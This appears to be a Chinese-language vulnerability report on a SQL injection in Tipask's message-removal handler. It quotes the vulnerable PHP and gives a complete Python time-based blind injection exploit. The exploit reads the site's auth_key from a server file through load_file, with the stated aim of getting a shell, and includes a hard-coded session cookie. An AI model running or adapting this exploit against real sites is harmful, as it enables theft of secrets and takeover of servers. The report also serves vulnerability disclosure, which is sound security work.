### 简要描述: 审核真给力,刚提交就通过了 ,赞啊!!!! ### 详细说明: 部分案例: [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 经分析,下列文件存在 SQL 注入:/control/message.php,代码如下 ``` function onremovedialog() { if($this->post['message_author']){ $authors = $this->post['message_author']; $_ENV['message']->remove_by_author($authors); $this->message("对话删除成功!", get_url_source()); } } ``` 跟进 remove_by_author 函数($authors 即 POST 参数 message_author 数组,其中每个元素 $fromuid 未经 intval 等整型过滤便直接拼接进下面四条 SQL 语句) ``` function remove_by_author($authors) { foreach ($authors as $fromuid) { $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status=1)"); $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status=2"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=2 WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status IN (0,1))"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=1 WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . 
") AND status IN (0,2))"); } } ``` 可以看出,这里存在多处注入 为了无限制getshell,依然还是获取加密的auth_key Exp,直接参照上一个漏洞改改就可以用: ``` import urllib import urllib2 from time import * def inject(url,payload): post = urllib.urlencode({ 'message_author[]':payload }) header = {'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'} req = urllib2.Request(url,post,header) start_time = time() resp = urllib2.urlopen(req) flag = int(time()-start_time) return flag def exploit(): result = "" url = 'http://127.0.0.1/tipask/?message/removedialog.html' for i in range(4677,4741): for num in range(32,127): flag= inject(url,"6 AND touid=2)) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num)) if flag>0: mstr = i - 4676 result = result+chr(num) print 'auth_key =>'+result break if __name__=="__main__": exploit() ``` 运行,如图所示: [<img src="https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg) ### 漏洞证明: 运行,如图所示: [<img src="https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg)